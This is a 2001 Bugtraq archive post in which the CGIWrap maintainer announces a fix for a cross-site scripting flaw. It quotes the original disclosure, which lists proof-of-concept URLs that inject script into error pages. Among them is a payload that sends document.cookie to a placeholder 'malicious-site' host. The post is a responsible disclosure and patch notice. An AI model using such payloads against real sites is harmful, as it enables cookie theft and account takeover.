Bugtraq mailing list archives
Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability)
From: Nathan Neulinger <nneul () umr edu>
Date: Sun, 22 Jul 2001 12:39:03 -0500
The following cross-site scripting vulnerability was reported in cgiwrap. This has just been corrected in version 3.7 which has just been released. http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz All error message output is now html encoded to prevent this problem. -- Nathan
"TAKAGI, Hiromitsu" wrote:Hi, I found a cross-site scripting vulnerability in CGIWrap. Cookies issued by the server on which CGIWrap is installed can be stolen. Please try to access the following URLs. Confirming the bug: http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E http://www.unixtools.org/cgi-bin/cgiwrap/<S> http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S> JavaScript code will be executed: http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT> http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT> http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)> Stealing your Cookies issued by www.unixtools.org, if any: http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
<snip>
Regards, -- Hiromitsu Takagi, Ph.D. National Institute of Advanced Industrial Science and Technology, Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan http://www.etl.go.jp/~takagi/_______________________________________________ cgiwrap-users mailing list cgiwrap-users () lists sourceforge net http://lists.sourceforge.net/lists/listinfo/cgiwrap-users
-- ------------------------------------------------------------ Nathan Neulinger EMail: nneul () umr edu University of Missouri - Rolla Phone: (573) 341-4841 CIS - Systems Programming Fax: (573) 341-4216
Current thread:
- Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability) Nathan Neulinger (Jul 23)